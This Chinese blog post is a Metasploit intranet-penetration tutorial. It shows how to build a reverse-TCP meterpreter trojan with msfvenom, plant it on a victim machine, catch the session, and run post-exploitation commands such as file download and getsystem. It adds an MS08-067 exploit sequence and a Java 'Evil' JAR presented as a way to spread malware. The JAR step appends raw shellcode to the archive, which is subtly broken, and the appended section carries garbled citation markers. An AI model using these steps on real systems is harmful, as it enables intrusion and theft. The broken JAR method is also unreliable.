内网渗透之——msf工具使用

本文详细介绍Metasploit框架的使用方法,包括msfconsole、msfvenom和msfencode的功能与操作流程,演示了如何利用这些工具进行木马制作、编码及反弹shell连接,实现远程控制和信息提取。

1.msfconsole

作用:
管理生成exp,管理反弹的shell,通过反弹的shell进行后渗透。。。
模块介绍:
exploits:攻击脚本
payloads:攻击载荷(攻击效果控制)
auxiliaru:辅助模块(扫描工具等)
post:后渗透模块(提取信息)
encoders编码模块
nops:无操作生成器

2.msfvenom

作用:
制作木马

3.msfencode

作用:
对木马进行编码

4.msf使用:

1.打开一个终端,输入msfconsole 进入应用
​​​​在这里插入图片描述
2.查看各个模块内容(例:show payloads)
在这里插入图片描述
3.选择带reverse和meterpreter(发送端接受端连接)的payloads进行反弹端口
例:此处选择windows/x64/meterpreter_reverse_tcp,使用use windows/x64/meterpreter_reverse_tcp选择此payloads,输入show options查看使用方法
在这里插入图片描述
4.再打开一个终端,进行木马制作,生成的木马在当前目录下,之后将该文件复制到windows下(如不能复制,可开启ssh,使用xshell的sz 1.exe下载命令进行操作:开启ssh服务,/etc/ssh/sshd_config第32行改为PermitRootLogin yes,之后xshell连接)

msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=本机ip lport=端口 -f exe -o 1.exe

在这里插入图片描述
5.将刚制作好的木马1.exe传到受害机上
在这里插入图片描述
6.再次输入msfconsole 进入应用,输入use exploit/multi/handler进入管理工具
在这里插入图片描述
7.设置监听刚才生成木马的同一payload:set payload windows/x64/meterpreter_reverse_tcp
在这里插入图片描述
8.配置管理机ip(攻击者本机):set lhost 192.168.16.130
在这里插入图片描述
9.执行此管理工具:输入exploit
在这里插入图片描述
10.运行刚刚上传的1.exe木马,再查看管理攻击,拿到连接meterpreter
在这里插入图片描述
11.输入?可查看攻击命令,之后进行攻击即可

例:

获取命令行:shell
在这里插入图片描述
获取系统信息:sysinfo
在这里插入图片描述
下载文件:download 1.txt
在这里插入图片描述
上传文件:upload 路径
在这里插入图片描述
提权:getsystem
在这里插入图片描述

### 关于 Metasploit 框架在内网渗透中的应用 #### 什么是 Metasploit? Metasploit 是一种功能强大的开源渗透测试框架,广泛应用于网络安全评估和漏洞研究领域。该框架提供了丰富的模块化设计,支持多种类型的攻击向量以及后渗透阶段的操作工具[^1]。 #### 内网渗透的主要过程 内网渗透通常遵循标准化的渗透测试流程,具体分为以下几个部分: - **前期交互 (Pre-engagement Interactions)** 此阶段涉及与客户沟通以明确目标范围、时间安排以及其他约束条件等内容[^2]。 - **情报收集 (Intelligence Gathering)** 利用公开资源或技术手段搜集有关目标网络的信息,例如 IP 地址、开放端口和服务版本等数据。 - **威胁建模 (Thread Modelling)** 对所获得的情报进行分析处理,并识别潜在的安全风险点。 - **漏洞分析 (Vulnerability Analysis)** 运用扫描器或其他自动化工具检测系统中存在的弱点,同时验证其真实性。 - **渗透攻击 (Exploitation)** 配置合适的exploit模块针对发现的目标服务发起实际攻击尝试获取控制权^。 - **后渗透攻击 (Post Exploitation)** 成功入侵之后进一步探索内部环境寻找敏感资料或者横向移动至其他主机上继续扩展访问权限^。 - **报告撰写 (Reporting)** 将整个过程中遇到的问题汇总整理成文档形式提交给委托方作为改进依据^。 #### 使用案例:通过 MS08-067 漏洞实现远程代码执行 假设存在一台运行 Windows Server 2003 的服务器未修补 CVE-2008-4250(即著名的 MS08-067),可以按照如下方式利用 Metasploit 来完成对该机器的接管工作: ```bash use exploit/windows/smb/ms08_067_netapi set RHOSTS <target_ip> set PAYLOAD windows/meterpreter/reverse_tcp set LHOST <local_ip> set LPORT <listening_port> run ``` 上述命令序列依次完成了指定目标地址、选择有效载荷类型及其参数设置最后启动攻击动作的任务描述[^3]^。 另外,在某些特殊场景下如果目标环境中部署有 Java 应用程序,则还可以考虑采用基于 JVM 层面存在的缺陷来进行突破尝试。比如下面这个例子展示了如何创建一个带有隐藏功能的 JAR 文件用于分发传播恶意软件实例: ```java import java.io.*; public class Evil { public static void main(String[] args){ try{ Runtime.getRuntime().exec("cmd /c start calc.exe"); }catch(Exception e){} } } // Compile and package into a jar file. javac Evil.java && jar cvfe evil.jar Evil.class . ``` 接着再配合 `msfvenom` 工具生成自定义 payload 并嵌入到刚才准备好的载体当中去形成最终成品供后续投放使用[^4]^。 ```bash msfvenom -p generic/shell_reverse_tcp LHOST=<your_IP> LPORT=<port_number> -f raw > shellcode.bin cat shellcode.bin >> evil.jar zip -A evil.jar ``` 以上便是关于如何运用 Metasploit 开展内网渗透活动的一些基础知识和技术要点概述。
评论 3
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值